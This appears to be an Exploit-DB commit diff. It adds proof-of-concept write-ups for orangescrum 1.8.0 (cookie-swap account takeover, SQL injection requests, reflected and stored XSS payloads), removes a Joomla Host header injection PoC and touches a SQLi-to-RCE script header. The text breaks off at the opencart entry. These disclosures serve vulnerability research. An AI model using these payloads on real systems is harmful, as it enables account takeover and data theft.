DB: 2021-11-30
7 changes to exploits/shellcodes Joomla! 3.9.13 - 'Host' Header Injection orangescrum 1.8.0 - Privilege escalation (Authenticated) orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated) orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated) opencart 3.0.3.8 - Sessjion Injection
This commit is contained in:
parent
c60e7e2012
commit
897c47e020
7 changed files with 359 additions and 240 deletions
30
exploits/multiple/webapps/50551.txt
Normal file
30
exploits/multiple/webapps/50551.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated)
|
||||
# Date: 07/10/2021
|
||||
# Exploit Author: Hubert Wojciechowski
|
||||
# Contact Author: snup.php@gmail.com
|
||||
# Company: https://redteam.pl
|
||||
# Vendor Homepage: https://www.orangescrum.org/
|
||||
# Software Link: https://www.orangescrum.org/
|
||||
# Version: 1.8.0
|
||||
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
||||
|
||||
### Privilege escalation
|
||||
|
||||
|
||||
# The user must be assigned to the project with the account he wants to take over
|
||||
# The vulnerabilities in the application allow for:
|
||||
|
||||
* Taking over any account with which the project is assigned
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
# POC
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
## Example
|
||||
|
||||
1. Go to the dashboard
|
||||
2. Go to the page source view
|
||||
3. Find in source "var PUSERS"
|
||||
4. Copy "uniq_id" victim
|
||||
5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source
|
||||
6. After refreshing the page, you are logged in to the victim's account
|
133
exploits/multiple/webapps/50553.txt
Normal file
133
exploits/multiple/webapps/50553.txt
Normal file
|
@ -0,0 +1,133 @@
|
|||
# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
|
||||
# Date: 28/11/2021
|
||||
# Exploit Author: Hubert Wojciechowski
|
||||
# Contact Author: snup.php@gmail.com
|
||||
# Company: https://redteam.pl
|
||||
# Vendor Homepage: https://www.orangescrum.org/
|
||||
# Software Link: https://www.orangescrum.org/
|
||||
# Version: 1.8.0
|
||||
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
||||
|
||||
### SQL Injection
|
||||
|
||||
|
||||
# Authenticated user
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
# POC
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
## Example vuln parameters:
|
||||
|
||||
* project_id
|
||||
* old_project_id
|
||||
* uuid
|
||||
* uniqid
|
||||
* projid
|
||||
* id
|
||||
* caseno
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
## Example
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Req old_project_id=1' - error
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
POST /orangescrum/easycases/move_task_to_project HTTP/1.1
|
||||
Origin: http://127.0.0.1
|
||||
Content-Length: 64
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Host: 127.0.0.1:80
|
||||
Accept: */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||
Connection: close
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Sec-Fetch-Mode: cors
|
||||
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
|
||||
Referer: http://127.0.0.1/orangescrum/dashboard
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Sec-Fetch-Dest: empty
|
||||
|
||||
project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Res:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
HTTP/1.1 500 Internal Server Error
|
||||
Date: Sun, 28 Nov 2021 12:42:30 GMT
|
||||
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
|
||||
X-Powered-By: PHP/5.6.40
|
||||
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Content-Length: 132182
|
||||
Vary: User-Agent
|
||||
Expires: access 12 month
|
||||
Connection: close
|
||||
[...]
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Req old_project_id=1'' - not error
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
POST /orangescrum/easycases/move_task_to_project HTTP/1.1
|
||||
Origin: http://127.0.0.1
|
||||
Content-Length: 66
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Host: 127.0.0.1:80
|
||||
Accept: */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||
Connection: close
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Sec-Fetch-Mode: cors
|
||||
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
|
||||
Referer: http://127.0.0.1/orangescrum/dashboard
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Sec-Fetch-Dest: empty
|
||||
|
||||
project_id=3&old_project_id=2'';&case_id=2&case_no=1&is_multiple=0
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Res
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Nov 2021 12:51:23 GMT
|
||||
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
|
||||
X-Powered-By: PHP/5.6.40
|
||||
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:51:23 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Vary: User-Agent
|
||||
Expires: access 12 month
|
||||
Content-Length: 1
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
0
|
133
exploits/multiple/webapps/50554.txt
Normal file
133
exploits/multiple/webapps/50554.txt
Normal file
|
@ -0,0 +1,133 @@
|
|||
# Exploit Title: orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)
|
||||
# Date: 28/11/2021
|
||||
# Exploit Author: Hubert Wojciechowski
|
||||
# Contact Author: snup.php@gmail.com
|
||||
# Company: https://redteam.pl
|
||||
# Vendor Homepage: https://www.orangescrum.org/
|
||||
# Software Link: https://www.orangescrum.org/
|
||||
# Version: 1.8.0
|
||||
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
||||
|
||||
### XSS Reflected
|
||||
|
||||
|
||||
# Authenticated user
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
# POC
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
## Example XSS Reflected
|
||||
|
||||
Param: projid
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Req
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
POST /orangescrum/easycases/edit_reply HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||
Accept: */*
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 64
|
||||
Origin: http://127.0.0.1
|
||||
Connection: close
|
||||
Referer: http://127.0.0.1/orangescrum/dashboard
|
||||
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; CURRENT_FILTER=cases
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
id=5&reply_flag=1&projid=1zxcvczxzxcv"><script>alert(1)</script>
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Res:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Nov 2021 13:28:57 GMT
|
||||
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
|
||||
X-Powered-By: PHP/5.6.40
|
||||
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 15:28:57 GMT; Max-Age=7199; path=/; domain=127.0.0.1
|
||||
Content-Length: 1114
|
||||
Vary: User-Agent
|
||||
Expires: access 12 month
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
<table cellpadding="0" cellspacing="0" class="edit_rep_768 col-lg-12">
|
||||
<tr>
|
||||
<td>
|
||||
<textarea name="edit_reply_txtbox5" id="edit_reply_txtbox5" rows="3" class="reply_txt_ipad col-lg-12">
|
||||
xczcxz"/><b>bb</b>bbxczcxz"/><xczcxz"/><b>bb</b>bb;b>bb</b>bbxczcxz"/><b>bb</b>bb </textarea>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align="right">
|
||||
<div id="edit_btn5" class="fr">
|
||||
<button type="button" value="Save" style="margin:5px;padding:3px 32px 3px 32px;" class="btn btn_blue" onclick="save_editedvalue_reply(2,5,1zxcvczxzxcv"><script>alert(1)</script>,'c64271510399996f611739b
|
||||
[...]
|
||||
|
||||
|
||||
## Example XSS Stored
|
||||
|
||||
Example vuln paraMETERS:
|
||||
* CS_message
|
||||
* name
|
||||
* data[User][email]
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Param: CS_message
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Req
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
POST /orangescrum/easycases/ajaxpostcase HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 393
|
||||
Origin: http://127.0.0.1
|
||||
Connection: close
|
||||
Referer: http://127.0.0.1/orangescrum/dashboard/?project=3966c2c5cc3745d161640d07450d682c
|
||||
Cookie: language=en-gb; currency=USD; CAKEPHP=j27a7es1lv1ln77gpngicqshe4; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; CURRENT_FILTER=cases; TASK_TYPE_IN_DASHBOARD=1; LAST_CREATED_PROJ=14
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
pid=14&CS_project_id=8f4adc0f496a3738f04d629be909488d&CS_istype=2&CS_title=&CS_type_id=15&CS_priority=1&CS_message=zxcvbzz"/><img%20src=x%20onmouseover=alert(1)>axcbv&CS_assign_to=1&CS_due_date=&CS_milestone=&postdata=Post&pagename=dashboard&emailUser%5B%5D=1&CS_id=2678&CS_case_no=1&datatype=1&CS_legend=2&prelegend=1&hours=0&estimated_hours=0&completed=0&taskid=0&task_uid=0&editRemovedFile=
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Res:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Nov 2021 13:51:29 GMT
|
||||
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
|
||||
X-Powered-By: PHP/5.6.40
|
||||
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 15:51:29 GMT; Max-Age=7200; path=/; domain=127.0.0.1
|
||||
Vary: User-Agent
|
||||
Expires: access 12 month
|
||||
Content-Length: 698
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
|
||||
{"success":"success","pagename":"dashboard","formdata":"8f4adc0f496a3738f04d629be909488d","postParam":"Post","caseUniqId":"eb8671bf1e20702b7793b11152e9ff32","format":2,"allfiles":null,"caseNo":"1","emailTitle":"aaaaaaaaaaaaaaz\"\/><img src=x onmouseover=alert(1)>a","emailMsg":"zxcvbzz\"\/><img src=x onmouseover=alert(1)>
|
||||
[...]
|
|
@ -1,237 +0,0 @@
|
|||
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
|
||||
# Author: Pablo Santiago
|
||||
# Date: 2019-11-12
|
||||
# Vendor Homepage: https://www.joomla.org/
|
||||
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
|
||||
# Version: 3.9.13
|
||||
# CVE : N/A
|
||||
# Tested on: Windows 10
|
||||
|
||||
#PoC
|
||||
|
||||
curl http://localhost/joomla/ -H "Host: exploit-db.com"
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html lang="en-gb" dir="ltr">
|
||||
<head>
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
|
||||
<meta charset="utf-8" />
|
||||
<base href="http://exploit-db.com/joomla/" />
|
||||
<meta name="description" content="javacript:alert(document.cookie)" />
|
||||
<meta name="generator" content="Joomla! - Open Source Content
|
||||
Management" />
|
||||
<title>Home</title>
|
||||
<link href="/joomla/index.php?format=feed&type=rss"
|
||||
rel="alternate" type="application/rss+xml" title="RSS 2.0" />
|
||||
<link href="/joomla/index.php?format=feed&type=atom"
|
||||
rel="alternate" type="application/atom+xml" title="Atom 1.0" />
|
||||
<link href="/joomla/templates/protostar/favicon.ico"
|
||||
rel="shortcut icon" type="image/vnd.microsoft.icon" />
|
||||
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
|
||||
rel="stylesheet" />
|
||||
<link href="https://fonts.googleapis.com/css?family=Open+Sans"
|
||||
rel="stylesheet" />
|
||||
<style>
|
||||
|
||||
h1, h2, h3, h4, h5, h6, .site-title {
|
||||
font-family: 'Open Sans', sans-serif;
|
||||
}
|
||||
</style>
|
||||
<script type="application/json" class="joomla-script-options
|
||||
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
|
||||
<script
|
||||
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<script
|
||||
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<script
|
||||
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<script
|
||||
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<script
|
||||
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<script
|
||||
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<!--[if lt IE 9]><script
|
||||
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
|
||||
<script
|
||||
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<!--[if lt IE 9]><script
|
||||
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
|
||||
<script
|
||||
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
|
||||
<script>
|
||||
jQuery(window).on('load', function() {
|
||||
new JCaption('img.caption');
|
||||
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
|
||||
initTooltips); function initTooltips (event, container) { container =
|
||||
container || document;$(container).find(".hasTooltip").tooltip({"html":
|
||||
true,"container": "body"});} });
|
||||
</script>
|
||||
|
||||
</head>
|
||||
<body class="site com_content view-featured no-layout no-task itemid-101">
|
||||
<!-- Body -->
|
||||
<div class="body" id="top">
|
||||
<div class="container">
|
||||
<!-- Header -->
|
||||
<header class="header" role="banner">
|
||||
<div class="header-inner clearfix">
|
||||
<a class="brand pull-left"
|
||||
href="/joomla/">
|
||||
<span
|
||||
class="site-title"
|
||||
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
|
||||
|
||||
</a>
|
||||
<div class="header-search pull-right">
|
||||
|
||||
</div>
|
||||
</div>
|
||||
</header>
|
||||
|
||||
<div class="row-fluid">
|
||||
<main
|
||||
id="content" role="main" class="span9">
|
||||
<!-- Begin Content -->
|
||||
|
||||
<div id="system-message-container">
|
||||
</div>
|
||||
|
||||
<div class="blog-featured"
|
||||
itemscope itemtype="https://schema.org/Blog">
|
||||
<div class="page-header">
|
||||
<h1>
|
||||
Home </h1>
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
</div>
|
||||
|
||||
<div class="clearfix"></div>
|
||||
<div aria-label="breadcrumbs"
|
||||
role="navigation">
|
||||
<ul itemscope itemtype="https://schema.org/BreadcrumbList"
|
||||
class="breadcrumb">
|
||||
<li>
|
||||
You are here:  
|
||||
</li>
|
||||
|
||||
<li
|
||||
itemprop="itemListElement" itemscope
|
||||
itemtype="https://schema.org/ListItem" class="active">
|
||||
<span itemprop="name">
|
||||
Home
|
||||
</span>
|
||||
<meta itemprop="position" content="1">
|
||||
</li>
|
||||
</ul>
|
||||
</div>
|
||||
|
||||
<!-- End Content -->
|
||||
</main>
|
||||
|
||||
<div id="aside" class="span3">
|
||||
<!-- Begin Right Sidebar -->
|
||||
<div class="well
|
||||
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
|
||||
mod-list">
|
||||
<li class="item-101 default current active"><a
|
||||
href="/joomla/index.php" >Home</a></li></ul>
|
||||
</div><div class="well "><h3 class="page-header">Login Form</h3><form
|
||||
action="/joomla/index.php" method="post" id="login-form"
|
||||
class="form-inline">
|
||||
<div class="userdata">
|
||||
<div id="form-login-username" class="control-group">
|
||||
<div class="controls">
|
||||
|
||||
<div class="input-prepend">
|
||||
<span class="add-on">
|
||||
<span
|
||||
class="icon-user hasTooltip" title="Username"></span>
|
||||
<label
|
||||
for="modlgn-username" class="element-invisible">Username</label>
|
||||
</span>
|
||||
<input
|
||||
id="modlgn-username" type="text" name="username" class="input-small"
|
||||
tabindex="0" size="18" placeholder="Username" />
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div id="form-login-password" class="control-group">
|
||||
<div class="controls">
|
||||
|
||||
<div class="input-prepend">
|
||||
<span class="add-on">
|
||||
<span
|
||||
class="icon-lock hasTooltip" title="Password">
|
||||
</span>
|
||||
<label
|
||||
for="modlgn-passwd" class="element-invisible">Password
|
||||
</label>
|
||||
</span>
|
||||
<input
|
||||
id="modlgn-passwd" type="password" name="password" class="input-small"
|
||||
tabindex="0" size="18" placeholder="Password" />
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div
|
||||
id="form-login-remember" class="control-group checkbox">
|
||||
<label for="modlgn-remember"
|
||||
class="control-label">Remember Me</label> <input id="modlgn-remember"
|
||||
type="checkbox" name="remember" class="inputbox" value="yes"/>
|
||||
</div>
|
||||
<div id="form-login-submit"
|
||||
class="control-group">
|
||||
<div class="controls">
|
||||
<button type="submit" tabindex="0"
|
||||
name="Submit" class="btn btn-primary login-button">Log in</button>
|
||||
</div>
|
||||
</div>
|
||||
<ul class="unstyled">
|
||||
<li>
|
||||
<a
|
||||
href="/joomla/index.php/component/users/?view=remind&Itemid=101">
|
||||
Forgot your username?</a>
|
||||
</li>
|
||||
<li>
|
||||
<a
|
||||
href="/joomla/index.php/component/users/?view=reset&Itemid=101">
|
||||
Forgot your password?</a>
|
||||
</li>
|
||||
</ul>
|
||||
<input type="hidden" name="option" value="com_users" />
|
||||
<input type="hidden" name="task" value="user.login" />
|
||||
<input type="hidden" name="return"
|
||||
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
|
||||
<input type="hidden"
|
||||
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>
|
||||
</form>
|
||||
</div>
|
||||
<!-- End Right Sidebar -->
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<!-- Footer -->
|
||||
<footer class="footer" role="contentinfo">
|
||||
<div class="container">
|
||||
<hr />
|
||||
|
||||
<p class="pull-right">
|
||||
<a href="#top" id="back-top">
|
||||
Back to Top
|
||||
</a>
|
||||
</p>
|
||||
<p>
|
||||
© 2019
|
||||
javacript:alert(document.cookie) </p>
|
||||
</div>
|
||||
</footer>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
||||
#PoC Visual
|
||||
https://imgur.com/a/IgO4ZxI
|
|
@ -8,8 +8,8 @@
|
|||
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
|
||||
|
||||
# Vulnerability: Through SQL injection to bypass the login form it is
|
||||
possible to upload a malicious file and after use that malicious file to
|
||||
execute code in the remote system.
|
||||
# possible to upload a malicious file and after use that malicious file to
|
||||
# execute code in the remote system.
|
||||
# Proof of Concept:
|
||||
|
||||
import requests
|
||||
|
|
57
exploits/php/webapps/50555.txt
Normal file
57
exploits/php/webapps/50555.txt
Normal file
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: opencart 3.0.3.8 - Sessjion Injection
|
||||
# Date: 28/11/2021
|
||||
# Exploit Author: Hubert Wojciechowski
|
||||
# Contact Author: snup.php@gmail.com
|
||||
# Company: https://redteam.pl
|
||||
# Vendor Homepage: https://www.opencart.com/
|
||||
# Software Link: https://www.opencart.com/
|
||||
# Version: 3.0.3.8
|
||||
